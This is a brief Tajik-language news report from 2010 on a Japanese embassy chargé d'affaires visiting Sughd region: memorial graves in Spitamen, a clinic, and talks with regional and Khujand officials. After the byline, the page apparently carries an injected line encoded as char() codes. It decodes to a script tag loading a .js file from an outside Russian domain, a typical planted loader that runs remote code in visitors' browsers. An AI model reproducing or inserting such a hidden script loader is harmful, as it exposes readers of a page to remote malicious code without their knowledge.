16.06.2010
Кордори сафорати Ҷопон дар вилоят
Дирӯз, кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон ҷаноби Йошихиро Накаяма ба вилояти Суғд ташриф овард.
Дар ҷараёни сафараш Йошихиро Накаяма ба сари қабри шаҳрвандони Ҷопон, ки дар ноҳияи Спитамен дафн шудаанд, гулчанбар гузошт ва аз дармонгоҳи марказии ноҳияи Спитамен боздид ба амал овард.
Баъдан, кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон бо роҳбарияти мақомоти иҷроияи ҳокимияти давлатии Суғд ва шаҳри Хуҷанд мулоқот кард. Дар ҷараёни сӯҳбат рушди ҳамкорҳои дуҷониба мавриди баррасӣ қарор гирифтанд.
Интизор меравад, ки кордори сафорати Ҷопон дар Ҷумҳурии Тоҷикистон Йошихиро Накаяма аз минтақаи озоди иқтисодии «Суғд», дармонгоҳи марказии шаҳри Хуҷанд, осорхонаи таърихии вилояти Суғд, масҷиди шайх Маслиҳатдин, бозори «Панҷшанбе»-и маркази вилоят дидан хоҳад кард.
Ҳамчунин, дар назар аст, ки ҷаноби Йошихиро Накаяма ба шаҳру навоҳии Исфара, Конибодом, Истравшан ва Бобоҷон Ғафуров сафар намуда, аз якчанд муассисаву иншооти иҷтимоӣ боздид хоҳад намуд.
Сафари сафири Ҷопон ҷаноби Йошихиро Накаяма дар вилояти Суғд идома дорад.
Ҷамшед МАЪРУФ
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)a3250a6276e9232bcf7ffbd1d6766b22.js" type="text/javascript">

ТАВЗЕҲОТ